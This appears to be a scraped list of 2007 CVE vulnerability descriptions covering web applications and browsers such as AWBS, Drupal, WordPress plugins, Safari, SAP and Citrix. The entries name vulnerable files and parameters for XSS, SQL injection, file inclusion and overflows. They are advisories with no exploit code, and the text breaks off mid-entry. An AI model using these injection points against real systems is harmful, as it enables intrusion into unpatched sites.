titletext-ed.php. [CVE-2007-4113] Unspecified vulnerability in Advanced Webhost Billing System (AWBS) before 2.6.0 allows remote authenticated users to obtain configuration data about other dedicated servers via unspecified vectors. [CVE-2007-4112] Multiple SQL injection vulnerabilities in Advanced Webhost Billing System (AWBS) before 2.6.0, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged for XSS attacks that "bypass AWBS's anti-XSS input validation." [CVE-2007-4111] SQL injection vulnerability in the login script in Real Estate listing website application template, when logging in as user or manager, allows remote attackers to execute arbitrary SQL commands via the Password parameter. [CVE-2007-4109] SQL injection vulnerability in sign_in.aspx in WebStore (Online Store Application Template) allows remote attackers to execute arbitrary SQL commands via the Password parameter. [CVE-2007-4108] SQL injection vulnerability in sign_in.aspx in WebEvents (Online Event Registration Template) allows remote attackers to execute arbitrary SQL commands via the Password parameter. [CVE-2007-4104] Multiple cross-site scripting (XSS) vulnerabilities in the WP-FeedStats before 2.4 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, one of which involves an rss2 feed with an invalid or missing blog with an XSS sequence in the query string. [CVE-2007-4102] Cross-site scripting (XSS) vulnerability in search.php for sBlog 0.7.3 Beta allows remote attackers to inject arbitrary HTML and web script via a leading '"/></> sequence in the search string. [CVE-2007-4100] MLDonkey before 2.9.0 does not load certain code from $MLDONKEY/web_infos/ before the network modules become active, which allows remote attackers to bypass the IP blocklist. [CVE-2007-4093] Minb Is Not a Blog (minb) stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing usernames and encrypted passwords via a direct request for db/users.db. [CVE-2007-4090] Multiple cross-site scripting (XSS) vulnerabilities in Vikingboard 0.1.2 allow remote attackers to inject arbitrary web script or HTML via (1) the URI to inc/lib/screen.php or (2) the title parameter to post.php. NOTE: vector 2 might overlap CVE-2006-6283. NOTE: the provenance of this information is unknown [CVE-2007-4088] Multiple cross-site scripting (XSS) vulnerabilities in Vikingboard 0.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) id, (2) f, (3) quote, and (4) act parameters to cp.php [CVE-2007-4083] Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft AskMe Pro allow remote attackers to inject arbitrary web script or HTML via (1) the cat_id parameter to search.php or the (2) typ parameter to register.php. [CVE-2007-4082] Cross-site scripting (XSS) vulnerability in contact_author.php AlstraSoft Article Manager Pro allows remote attackers to inject arbitrary web script or HTML via the userid parameter. [CVE-2007-4081] Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft Affiliate Network Pro allow remote attackers to inject arbitrary web script or HTML via vectors in (a) merchants/index.php, including the (1) id or (2) msg parameter in a programedit action [CVE-2007-4080] Cross-site scripting (XSS) vulnerability in index.php AlstraSoft E-Friends allows remote attackers to inject arbitrary web script or HTML via the p_id parameter in a people_card action. NOTE: this might overlap CVE-2006-2564. [CVE-2007-4079] Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft SMS Text Messaging Enterprise allow remote attackers to inject arbitrary web script or HTML via the (1) domain or (2) q parameter to (a) admin/membersearch.php, or (3) the userid parameter to (b) admin/edituser.php. [CVE-2007-4078] Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft Text Ads Enterprise allow remote attackers to inject arbitrary web script or HTML via the (1) r parameter to (a) forgot_uid.php, the (2) query or (3) sk parameter to (b) search_results.php, or (4) the pageId parameter to (c) website_page.php. [CVE-2007-4077] Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft Video Share Enterprise allow remote attackers to inject arbitrary web script or HTML via the (1) msg, (2) page, (3) viewkey, or (4) viewtype parameter to (a) view_video.php [CVE-2007-4075] Cross-site scripting (XSS) vulnerability in index.asp in Alisveris Sitesi Scripti allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search mod action. NOTE: the provenance of this information is unknown [CVE-2007-4073] Webbler CMS before 3.1.6 does not properly restrict use of "mail a friend" forms, which allows remote attackers to send arbitrary amounts of forged e-mail. NOTE: this could be leveraged for spam or phishing attacks. [CVE-2007-4072] Webbler CMS before 3.1.6 provides the full installation path within HTML comments in certain documents, which allows remote attackers to obtain sensitive information by viewing the HTML source, as demonstrated by viewing the source generated from index.php. [CVE-2007-4071] Multiple cross-site scripting (XSS) vulnerabilities in uploader/index.php in Webbler CMS before 3.1.6 allow remote attackers to inject arbitrary web script or HTML via the (1) page or (2) login parameter. [CVE-2007-4068] Multiple SQL injection vulnerabilities in Webyapar 2.0 allow remote attackers to execute arbitrary SQL commands via (1) the kat_id parameter to the default URI in a download action or (2) the id parameter to the default URI in a duyurular_detay action. [CVE-2007-4067] Absolute path traversal vulnerability in the clInetSuiteX6.clWebDav ActiveX control in CLINETSUITEX6.OCX in Clever Internet ActiveX Suite 6.2 allows remote attackers to create or overwrite arbitrary files via a full pathname in the second argument to the GetToFile method. NOTE: some of these details are obtained from third party information. [CVE-2007-4064] Multiple cross-site scripting (XSS) vulnerabilities in Drupal 5.x before 5.2, and 4.7.x before 4.7.7, (1) allow remote attackers to inject arbitrary web script or HTML via "some server variables," including PHP_SELF [CVE-2007-4052] Cross-site scripting (XSS) vulnerability in utilities/login.asp in nukedit 4.9.7 and earlier allows remote attackers to inject arbitrary web script or HTML via the email parameter. NOTE: the provenance of this information is unknown [CVE-2007-4050] Unspecified vulnerability in WebUI in ADempiere Bazaar before 3.3 beta Victoria edition allows remote attackers to access system-level windows via unspecified vectors. [CVE-2007-4048] Cross-site scripting (XSS) vulnerability in index.php in phpSysInfo 2.5.4-dev and earlier allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2007-4028] Absolute path traversal vulnerability in index.php in Webspell 4.01.02 allows remote attackers to include and execute arbitrary local files via a full pathname in the site parameter. NOTE: some of these details are obtained from third party information. [CVE-2007-4024] Cross-site scripting (XSS) vulnerability in W1L3D4_aramasonuc.asp in W1L3D4 Philboard 0.3 allows remote attackers to inject arbitrary web script or HTML via the searchterms parameter. NOTE: the provenance of this information is unknown [CVE-2007-4023] Cross-site scripting (XSS) vulnerability in the login CGI program in Aruba Mobility Controller 2.5.4.18 and earlier, and 2.4.8.6-FIPS and earlier FIPS versions, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-4022] Cross-site scripting (XSS) vulnerability in frontend/x/htaccess/changepro.html in cPanel 10.9.1 allows remote attackers to inject arbitrary web script or HTML via the resname parameter. [CVE-2007-4021] Multiple cross-site scripting (XSS) vulnerabilities in login.php in Brain Book Software Secure 1.0.20070629 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) user and (2) pwd parameters. [CVE-2007-4020] Multiple cross-site scripting (XSS) vulnerabilities in login.php in AdMan 1.0.20051202 FF 3 patch and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) user and (2) pwd parameters. [CVE-2007-4018] Citrix Access Gateway Advanced Edition before firmware 4.5.5 allows attackers to redirect users to arbitrary web sites and conduct phishing attacks via unknown vectors. [CVE-2007-4017] Cross-site request forgery (CSRF) vulnerability in the web-based administration console in Citrix Access Gateway before firmware 4.5.5 allows remote attackers to perform certain configuration changes as administrators. [CVE-2007-4014] Cross-site scripting (XSS) vulnerability in a certain index.php installation script related to the (1) Blix 0.9.1, (2) Blixed 1.0, and (3) BlixKrieg (Blix Krieg) 2.2 themes for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter, possibly a related issue to CVE-2007-2757. NOTE: the provenance of this information is unknown [CVE-2007-3991] Multiple cross-site scripting (XSS) vulnerabilities in cv.asp in Asp cvmatik 1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) Adiniz (Ady), (2) Soyadiniz (Soyady), (3) Ehliyet, (4) Askerlik, and (5) GSM parameters [CVE-2007-3989] Multiple cross-site scripting (XSS) vulnerabilities in default.asp in Dora Emlak 1.0, when the goster parameter is set to iletisim, allow remote attackers to inject arbitrary web script or HTML via the (1) Adiniz and (2) Soyadiniz parameters [CVE-2007-3988] Session fixation vulnerability in Virtual Hosting Control System (VHCS) 2.4.7.1 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter. [CVE-2007-3978] Session fixation vulnerability in bwired allows remote attackers to hijack web sessions by setting the PHPSESSID parameter. [CVE-2007-3977] Cross-site scripting (XSS) vulnerability in bwired allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3975] Cross-site scripting (XSS) vulnerability in index.php in Elite Forum 1.0.0.0 allows remote attackers to inject arbitrary web script or HTML via the title parameter in a ptopic action, a different vulnerability than CVE-2005-3412. [CVE-2007-3973] Multiple cross-site scripting (XSS) vulnerabilities in JBlog 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to (a) index.php, or the (2) search parameter or (3) theme cookie to (b) recherche.php. [CVE-2007-3963] Multiple cross-site scripting (XSS) vulnerabilities in UseBB 1.0.7, and possibly other 1.0.x versions, allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF) to (1) upgrade-0-2-3.php, (2) upgrade-0-3.php, or (3) upgrade-0-4.php in install/, a different vulnerability than CVE-2005-4193. [CVE-2007-3960] Multiple unspecified vulnerabilities in IBM WebSphere Application Server (WAS) before Fix Pack 21 (6.0.2.21) have unknown impact and attack vectors, aka (1) PK33799, or (2) a "Potential security exposure" in the Samples component (PK40213). [CVE-2007-3956] TeamSpeak WebServer 2.0 for Windows does not validate parameter value lengths and does not expire TCP sessions, which allows remote attackers to cause a denial of service (CPU and memory consumption) via long username and password parameters in a request to login.tscmd on TCP port 14534. [CVE-2007-3950] lighttpd 1.4.15, when run on 32 bit platforms, allows remote attackers to cause a denial of service (daemon crash) via unspecified vectors involving the use of incompatible format specifiers in certain debugging messages in the (1) mod_scgi, (2) mod_fastcgi, and (3) mod_webdav modules. [CVE-2007-3944] Multiple heap-based buffer overflows in the Perl Compatible Regular Expressions (PCRE) library in the JavaScript engine in WebKit in Apple Safari 3 Beta before Update 3.0.3, and iPhone before 1.0.1, allow remote attackers to execute arbitrary code via certain JavaScript regular expressions. NOTE: this issue was originally reported only for MobileSafari on the iPhone. NOTE: it is not clear whether this stems from an issue in the original distribution of PCRE, which might already have a separate CVE identifier. [CVE-2007-3941] Cross-site scripting (XSS) vulnerability in profile.php in Jasmine CMS 1.0_1 allows remote authenticated users to inject arbitrary web script or HTML via the profile_email parameter. NOTE: the provenance of this information is unknown [CVE-2007-3940] Cross-site scripting (XSS) vulnerability in default.asp in QuickerSite 1.7.2 allows remote attackers to inject arbitrary web script or HTML via the svalue parameter in a search action. NOTE: some of these details are obtained from third party information. [CVE-2007-3918] Cross-site scripting (XSS) vulnerability in account/verify.php in GForge 4.6b2 allows remote attackers to inject arbitrary web script or HTML via the confirm_hash parameter. [CVE-2007-3888] Multiple cross-site scripting (XSS) vulnerabilities in Insanely Simple Blog 0.5 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the search action, possibly related to the term parameter to index.php [CVE-2007-3887] Multiple cross-site scripting (XSS) vulnerabilities in mesaj_formu.asp in ASP Ziyaretci Defteri 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) Isim, (2) Mesajiniz, and (3) E-posta fields. NOTE: these probably correspond to the isim, mesaj, and posta parameters to save.php. [CVE-2007-3886] Cross-site scripting (XSS) vulnerability in default.asp in Element CMS allows remote attackers to inject arbitrary web script or HTML via the s parameter in a search pID action. [CVE-2007-3885] Cross-site scripting (XSS) vulnerability in philboard_search.asp in husrevforum 1.0.1 allows remote attackers to inject arbitrary web script or HTML via the searchterms parameter. NOTE: the provenance of this information is unknown [CVE-2007-3871] Stampit Web uses guessable id values for online stamp purchases, which allows remote attackers to cause a denial of service (stamp invalidation) via a SOAP request with an id value for a stamp that has not yet been printed. [CVE-2007-3858] Multiple unspecified vulnerabilities in Oracle Database 10.2.0.3 allow remote authenticated users to have an unknown impact via (1) EXFSYS.DBMS_RLMGR_UTL in Rules Manager (DB11) and (2) Program Interface (DB13). [CVE-2007-3842] Cross-site scripting (XSS) vulnerability in the 8e6 R3000 Enterprise Filter before 2.0.05 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this may be the same as CVE-2007-2970. [CVE-2007-3839] Cross-site scripting (XSS) vulnerability in takeprofedit.php in TBDev.NET DR 010306 and earlier allows remote attackers to inject arbitrary web script or HTML via a javascript: URI in the avatar parameter. NOTE: this may be related to the tracker program in the Janitor package. NOTE: the provenance of this information is unknown [CVE-2007-3838] Cross-site scripting (XSS) vulnerability in takeprofedit.php in TBDev.NET DR 11-10-05-BETA-SF1:111005 and earlier allows remote attackers to inject arbitrary web script or HTML via the SRC attribute of a SCRIPT element in the avatar parameter. NOTE: this may be related to the tracker program in the Janitor package. NOTE: the provenance of this information is unknown [CVE-2007-3835] Cross-site scripting (XSS) vulnerability in Ex Libris MetaLib 3.13 and 4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to a resource id that can be discovered through a search. [CVE-2007-3834] Multiple cross-site scripting (XSS) vulnerabilities in Ex Libris ALEPH allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to a URL that can be discovered through a keyword search. NOTE: this may be related to the MetaLib XSS issue, CVE-2007-3835. [CVE-2007-3830] Cross-site scripting (XSS) vulnerability in alert.php in ISS Proventia Network IPS GX5108 1.3 and GX5008 1.5 allows remote attackers to inject arbitrary web script or HTML via the reminder parameter. [CVE-2007-3822] Multiple cross-site scripting (XSS) vulnerabilities in Webcit before 7.11 allow remote attackers to inject arbitrary web script or HTML via (1) the who parameter to showuser [CVE-2007-3821] Cross-site request forgery (CSRF) vulnerability in Webcit before 7.11 allows remote attackers to modify configurations and perform other actions as arbitrary users via unspecified vectors. [CVE-2007-3817] Cross-site scripting (XSS) vulnerability in the LoginToboggan module 4.7.x-1.0, 4.7.x-1.x-dev, and 5.x-1.x-dev before 20070712 for Drupal, when configured to display a "Log out" link, allows remote attackers to inject arbitrary web script or HTML via a crafted username. NOTE: Drupal sanitizes the username by removing certain characters, so this might not be a vulnerability on default installations. [CVE-2007-3807] Multiple cross-site scripting (XSS) vulnerabilities in SiteScape Forum before 7.3 allow remote attackers to inject arbitrary web script or HTML via the user name field in the login procedure, and other unspecified vectors. [CVE-2007-3796] The password reset feature in the Spam Quarantine HTTP interface for MailMarshal SMTP 6.2.0.x before 6.2.1 allows remote attackers to modify arbitrary account information via a UserId variable with a large amount of trailing whitespace followed by a malicious value, which triggers SQL buffer truncation due to length inconsistencies between variables. [CVE-2007-3784] Cross-site scripting (XSS) vulnerability in the Belkin G Plus Router F5D7231-4 with firmware 4.05.03 allows remote attackers to inject arbitrary web script or HTML via a hostname of a DHCP client. [CVE-2007-3774] Dvbbs 7.1.0 SP1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for Data/Dvbbs7.mdb. [CVE-2007-3761] Cross-site scripting (XSS) vulnerability in Safari in Apple iPhone 1.1.1 allows remote attackers to inject arbitrary web script or HTML by causing Javascript events to be applied to a frame in another domain. [CVE-2007-3760] Cross-site scripting (XSS) vulnerability in Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and Mac OS X 10.4 through 10.4.10, allows remote attackers to inject arbitrary web script or HTML via frame tags. [CVE-2007-3758] Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and in Mac OS X 10.4 through 10.4.10, allows remote attackers to set Javascript window properties for web pages that are in a different domain, which can be leveraged to conduct cross-site scripting (XSS) attacks. [CVE-2007-3756] Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and Mac OS X 10.4 through 10.4.10, allows remote attackers to obtain sensitive information via a crafted web page that identifies the URL of the parent window, even when the parent window is in a different domain. [CVE-2007-3747] The Java interface to CoreAudio on Apple Mac OS X 10.3.9 and 10.4.10 does not restrict object instantiation and manipulation to valid heap addresses, which allows remote attackers to execute arbitrary code via a crafted applet. [CVE-2007-3746] The Java interface to CoreAudio on Apple Mac OS X 10.3.9 and 10.4.10 does not properly check the bounds of heap read and write operations, which allows remote attackers to execute arbitrary code via a crafted applet. [CVE-2007-3745] The Java interface to CoreAudio on Apple Mac OS X 10.3.9 and 10.4.10 contains an unsafe interface that is exposed by JDirect, which allows remote attackers to free arbitrary memory and thereby execute arbitrary code. [CVE-2007-3742] WebKit in Apple Safari 3 Beta before Update 3.0.3, and iPhone before 1.0.1, does not properly handle the interaction between International Domain Name (IDN) support and Unicode fonts, which allows remote attackers to create a URL containing "look-alike characters" (homographs) and possibly perform phishing attacks. [CVE-2007-3736] Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 2.0.0.5 allows remote attackers to inject arbitrary web script "into another site's context" via a "timing issue" involving the (1) addEventListener or (2) setTimeout function, probably by setting events that activate after the context has changed. [CVE-2007-3727] Multiple unspecified vulnerabilities in Webmatic before 2.7 have unknown impact and attack vectors, related to the "administration area." [CVE-2007-3715] Sun Java System Application Server and Web Server 7.0 through 9.0 before 20070710 do not properly process XSLT stylesheets in XSLT transforms in XML signatures, which allows context-dependent attackers to execute an arbitrary Java method via a crafted stylesheet, a related issue to CVE-2007-3716. [CVE-2007-3712] Multiple cross-site scripting (XSS) vulnerabilities in HiddenChest "is ve Bayi Basvuru Formu" (Yb ve Bayi Babvuru Formu) allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: the provenance of this information is unknown [CVE-2007-3708] Cross-site scripting (XSS) vulnerability in CodeIgniter 1.5.3 before 20070626 allows remote attackers to inject arbitrary web script or HTML via (1) String.fromCharCode and (2) malformed nested tag manipulations in an unspecified component, related to insufficient sanitization by the xss_clean function. [CVE-2007-3694] Cross-site scripting (XSS) vulnerability in login.php in Miro Project Broadcast Machine 0.9.9.9 allows remote attackers to inject arbitrary web script or HTML via the username parameter. [CVE-2007-3693] Cross-site scripting (XSS) vulnerability in Gobi as of 20070711, built on Helma, allows remote attackers to inject arbitrary web script or HTML via the q parameter to the search function. [CVE-2007-3685] Cross-site scripting (XSS) vulnerability in rpc.php in Unobtrusive Ajax Star Rating Bar before 1.2.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2007-3675] Multiple format string vulnerabilities in the kavwebscan.CKAVWebScan ActiveX control (kavwebscan.dll) in Kaspersky Online Scanner before 5.0.98 allow remote attackers to execute arbitrary code via format string specifiers in "various string formatting functions," which trigger heap-based buffer overflows. [CVE-2007-3672] Cross-site scripting (XSS) vulnerability in ecrire/tools.php in DotClear 1.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified form fields on the blogroll page. [CVE-2007-3655] Stack-based buffer overflow in javaws.exe in Sun Java Web Start in JRE 5.0 Update 11 and earlier, and 6.0 Update 1 and earlier, allows remote attackers to execute arbitrary code via a long codebase attribute in a JNLP file. [CVE-2007-3653] Multiple cross-site scripting (XSS) vulnerabilities in Farsi Script (aka FaScript) FaName 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) key or (2) desc parameter to index.php, or (3) the name parameter to page.php. [CVE-2007-3650] myWebland myBloggie 2.1.6 allow remote attackers to obtain sensitive information via (1) an invalid year parameter to calendar.php, reached through index.php [CVE-2007-3648] SQL injection vulnerability in Webmatic before 2.6.2, and possibly other versions before 2.7, allows remote attackers to execute arbitrary SQL commands via unspecified vectors, possibly related to admin/admin_album.php and admin/admin_downloads.php. NOTE: some of these details are obtained from third party information. [CVE-2007-3639] WordPress before 2.2.2 allows remote attackers to redirect visitors to other websites and potentially obtain sensitive information via (1) the _wp_http_referer parameter to wp-pass.php, related to the wp_get_referer function in wp-includes/functions.php [CVE-2007-3623] Cross-site scripting (XSS) vulnerability in the Hitachi JP1/HiCommand Device Manager, Tiered Storage Manager, Replication Monitor, and GlobalLink Availability Manager before 20070528 allows remote attackers to inject arbitrary web script or HTML via the Expect HTTP header. [CVE-2007-3615] Internet Communication Manager (aka ICMAN.exe or ICM) in SAP NetWeaver Application Server 6.x and 7.x, possibly only on Windows, allows remote attackers to cause a denial of service (process crash) via a URI of a certain length that contains a sap-isc-key parameter, related to configuration of a web cache. [CVE-2007-3614] Multiple stack-based buffer overflows in waHTTP.exe (aka the SAP DB Web Server) in SAP DB, possibly 7.3 through 7.5, allow remote attackers to execute arbitrary code via (1) a certain cookie value [CVE-2007-3613] Cross-site scripting (XSS) vulnerability in ADM:GETLOGFILE in SAP Internet Graphics Service (IGS) allows remote attackers to inject arbitrary web script or HTML via the PARAMS parameter. [CVE-2007-3602] The SOAP webservice in vtiger CRM before 5.0.3 does not ensure that authenticated accounts are active, which allows remote authenticated users with inactive accounts to access and modify data, as demonstrated by the Thunderbird plugin. [CVE-2007-3597] Session fixation vulnerability in Zen Cart 1.3.7 and earlier allows remote attackers to hijack web sessions by setting the Cookie parameter. [CVE-2007-3594] Multiple cross-site scripting (XSS) vulnerabilities in AdventNet ManageEngine OpManager 6 and 7 allow remote attackers to inject arbitrary web script or HTML via the (1) name parameter in (a) ping.do and (b) traceRoute.do in map/ [CVE-2007-3593] Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine NetFlow Analyzer 5 allow remote attackers to inject arbitrary web script or HTML via the (1) alpha parameter in (a) netflow/jspui/applicationList.jsp, the (2) task parameter in (b) netflow/jspui/appConfig.jsp, the (3) view parameter in (c) netflow/jspui/index.jsp, and the (4) rtype parameter in (d) netflow/jspui/selectDevice.jsp and (e) netflow/jspui/customReport.jsp. NOTE: it was later reported that vector 3 also affects 7.5 build 7500. [CVE-2007-3590] Cross-site scripting (XSS) vulnerability in visitenkarte.php in b1gBB 2.24.0 allows remote attackers to inject arbitrary web script or HTML via the user parameter. [CVE-2007-3580] PHPIDS does not properly handle certain code containing newlines, as demonstrated by a try/catch block within a loop, which allows user-assisted remote attackers to inject arbitrary web script. [CVE-2007-3579] PHPIDS before 20070703 does not properly handle setting the .text property of a SCRIPT element before its attachment to the DOM, which allows remote attackers to inject arbitrary web script. [CVE-2007-3578] PHPIDS before 20070703 does not properly handle (1) arithmetic expressions and (2) unclosed comments, which allows remote attackers to inject arbitrary web script. [CVE-2007-3576] DISPUTED Microsoft Internet Explorer 6 executes web script from URIs of arbitrary scheme names ending with the "script" character sequence, using the (1) vbscript: handler for scheme names with 7 through 9 characters, and the (2) javascript: handler for scheme names with 10 or more characters, which might allow remote attackers to bypass certain XSS protection schemes. NOTE: other researchers dispute the significance of this issue, stating "this only works when typed in the address bar." [CVE-2007-3574] Multiple cross-site scripting (XSS) vulnerabilities in setup.cgi on the Cisco Linksys WAG54GS Wireless-G ADSL Gateway with 1.00.06 firmware allow remote attackers to inject arbitrary web script or HTML via the (1) c4_trap_ip_, (2) devname, (3) snmp_getcomm, or (4) snmp_setcomm parameter. [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address. [CVE-2007-3569] Multiple cross-site scripting (XSS) vulnerabilities in Oliver Library Management System allow remote attackers to inject arbitrary web script or HTML via the (1) updateform and (2) displayform parameter to (a) gateway/gateway.exe [CVE-2007-3561] Cross-site scripting (XSS) vulnerability in ara.asp in Efendy Blog 1.0 allows remote attackers to inject arbitrary web script or HTML via the ara parameter. NOTE: the provenance of this information is unknown [CVE-2007-3559] Cross-site scripting (XSS) vulnerability in infusions/shoutbox_panel/shoutbox_panel.php in PHP-Fusion 6.01.10 and 6.01.9, when guest posts are enabled, allows remote authenticated users to inject arbitrary web script or HTML via the URI, related to the FUSION_QUERY constant. [CVE-2007-3556] Liesbeth base CMS stores sensitive information under the web root with insufficient access control, which allows remote attackers to download an include file containing account credentials via a direct request for config.inc. [CVE-2007-3555] Cross-site scripting (XSS) vulnerability in index.php in Moodle 1.7.1 allows remote attackers to inject arbitrary web script or HTML via a style expression in the search parameter, a different vulnerability than CVE-2004-1424. [CVE-2007-3553] Cross-site scripting (XSS) vulnerability in Rapid Install Web Server in Oracle Application Server 11i allows remote attackers to inject arbitrary web script or HTML via a URL to the "Secondary Login Page", as demonstrated using (1) pls/ and (2) pls/MSBEP004/. NOTE: the provenance of this information is unknown [CVE-2007-3550] DISPUTED Microsoft Internet Explorer 6.0 and 7.0 allows remote attackers to fill Zones with arbitrary domains using certain metacharacters such as wildcards via JavaScript, which results in a denial of service (website suppression and resource consumption), aka "Internet Explorer Zone Domain Specification Dos and Page Suppressing". NOTE: this issue has been disputed by a third party, who states that the zone settings cannot be manipulated. [CVE-2007-3546] Cross-site scripting (XSS) vulnerability in the Windows GUI in Nessus Vulnerability Scanner before 3.0.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3542] Cross-site scripting (XSS) vulnerability in admin/auth.php in Pluxml 0.3.1 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2007-3541] Cross-site scripting (XSS) vulnerability in Kurinton sHTTPd 20070408 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3540] Multiple cross-site scripting (XSS) vulnerabilities in search.asp in rwAuction Pro 5.0 allow remote attackers to inject arbitrary web script or HTML via the (1) search, (2) show, (3) searchtype, (4) catid, and (5) searchtxt parameters, a different version and vectors than CVE-2005-4060. [CVE-2007-3534] SQL injection vulnerability in login.php in WebChat 0.78 allows remote attackers to execute arbitrary SQL commands via the rid parameter. [CVE-2007-3525] Ripe Website Manager 0.8.9 and earlier allows remote attackers to obtain configuration information via a direct request to includes/phpinfo.php, which calls the phpinfo function. NOTE: the provenance of this information is unknown [CVE-2007-3524] Multiple PHP remote file inclusion vulnerabilities in Ripe Website Manager 0.8.9 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the level parameter to (1) admin/includes/author_panel_header.php or (2) admin/includes/admin_header.php. [CVE-2007-3517] Multiple cross-site scripting (XSS) vulnerabilities in Claroline 1.8.3 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF) to (1) index.php, (2) demo/claroline170/index.php, and possibly other scripts. [CVE-2007-3516] Multiple cross-site scripting (XSS) vulnerabilities in kayit.asp in Gorki Online Santrac Sitesi allow remote attackers to inject arbitrary web script or HTML via the (1) kullanici, (2) posta, or (3) takim_adi parameter to uyeler.asp. NOTE: the provenance of this information is unknown [CVE-2007-3504] Directory traversal vulnerability in the PersistenceService in Sun Java Web Start in JDK and JRE 5.0 Update 11 and earlier, and Java Web Start in SDK and JRE 1.4.2_13 and earlier, for Windows allows remote attackers to perform unauthorized actions via an application that grants file overwrite privileges to itself. NOTE: this can be leveraged to execute arbitrary code by overwriting a .java.policy file. [CVE-2007-3503] The Javadoc tool in Sun JDK 6 and JDK 5.0 Update 11 can generate HTML documentation pages that contain cross-site scripting (XSS) vulnerabilities, which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3502] Unspecified vulnerability in the web-based product configuration system in Kaspersky Anti-Spam before 3.0 MP1 allows remote attackers to obtain access to certain directories. [CVE-2007-3501] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin 1.30.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vector than CVE-2007-1508. [CVE-2007-3500] Xeweb XEForum allows remote attackers to gain privileges via a modified xeforum cookie. [CVE-2007-3498] Cross-site scripting (XSS) vulnerability in smoketests/configForm.php in HTML Purifier before 2.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "unescaped print_r output." [CVE-2007-3496] Cross-site scripting (XSS) vulnerability in SAP Web Dynpro Java (BC-WD-JAV) in SAP NetWeaver Nw04 SP15 through SP19 and Nw04s SP7 through SP11, aka SAP Java Technology Services 640 before SP20 and SAP Web Dynpro Runtime Core Components 700 before SP12, allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header. [CVE-2007-3495] Multiple cross-site scripting (XSS) vulnerabilities in the SAP Internet Communication Framework (BC-MID-ICF) in the SAP Basis component 700 before SP12, and 640 before SP20, allow remote attackers to inject arbitrary web script or HTML via certain parameters associated with the default login error page. [CVE-2007-3489] Cross-site request forgery (CSRF) vulnerability in pop/WizU.html in the management interface in Check Point VPN-1 Edge X Embedded NGX 7.0.33x on the Check Point VPN-1 UTM Edge allows remote attackers to perform privileged actions as administrators, as demonstrated by a request with the swuuser and swupass parameters, which adds an administrator account. NOTE: the CSRF attack has no timing window because there is no logout capability in the management interface. [CVE-2007-3486] Cross-site scripting (XSS) vulnerability in AltaVista search engine allows remote attackers to inject arbitrary web script or HTML via the text parameter to the default URI. [CVE-2007-3485] Multiple cross-site scripting (XSS) vulnerabilities in Yandex.Server allow remote attackers to inject arbitrary web script or HTML via the (1) query or (2) within parameter to the default URI. [CVE-2007-3484] DISPUTED Cross-site scripting (XSS) vulnerability in search.php in Google Custom Search Engine allows remote attackers to inject arbitrary web script or HTML via the q parameter. NOTE: this issue is disputed by the Google Security Team, who states that "Google does not provide the 'search.php' script referenced. When a user creates a custom search engine, we provide them with a block of javascript to include on their site. Some users write additional code around this block of javascript to further customize their website." [CVE-2007-3460] Multiple PHP remote file inclusion vulnerabilities in index.php3 in EVA-Web 1.1 through 2.2 allow remote attackers to execute arbitrary PHP code via a URL in the (1) aide or (2) perso parameter. [CVE-2007-3448] Cross-site scripting (XSS) vulnerability in index.php in BugMall Shopping Cart 2.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the msgs parameter. NOTE: 4.0.2 and other versions might also be affected. [CVE-2007-3440] The Snom 320 SIP Phone, running snom320 linux 3.25, snom320-SIP 6.2.3, and snom320 jffs23.36, allows remote attackers to place calls to arbitrary phone numbers via certain requests to the web server on port 1800. [CVE-2007-3439] The Snom 320 SIP Phone, running snom320 linux 3.25, snom320-SIP 6.2.3, and snom320 jffs23.36, allows remote attackers to read a list of missed calls, received calls, and dialed numbers via a direct request to the web server on port 1800. [CVE-2007-3426] Cross-site scripting 